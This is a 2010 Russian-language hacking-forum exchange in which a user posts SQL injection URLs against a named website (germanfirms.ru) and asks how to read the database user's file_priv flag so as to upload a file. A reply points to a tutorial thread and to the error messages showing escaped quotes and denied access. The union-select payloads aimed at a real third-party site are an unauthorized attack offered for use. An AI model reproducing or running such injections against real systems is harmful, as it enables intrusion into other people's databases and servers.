30.05.2010, 13:59
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от CyberHunter
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл? Для кого человек это писал? https://forum.antichat.ru/thread104591.html
Сообщение от CyberHunter
Вот именно, что я это прочитал, делаю все как и написано, но ничего не получается.
Что не так делаю?
плохо читал видать 
если ошибки
Код:
MySQL server version for the right syntax to use near '\'db156426_4\' --'
Код:
Access denied for user 'db156426_4'@'127.0.0.2' to database 'mysql'
тебе ни о чем не говорят,то я не знаю...
Последний раз редактировалось .:[melkiy]:.; 30.05.2010 в 14:24..
|
|
|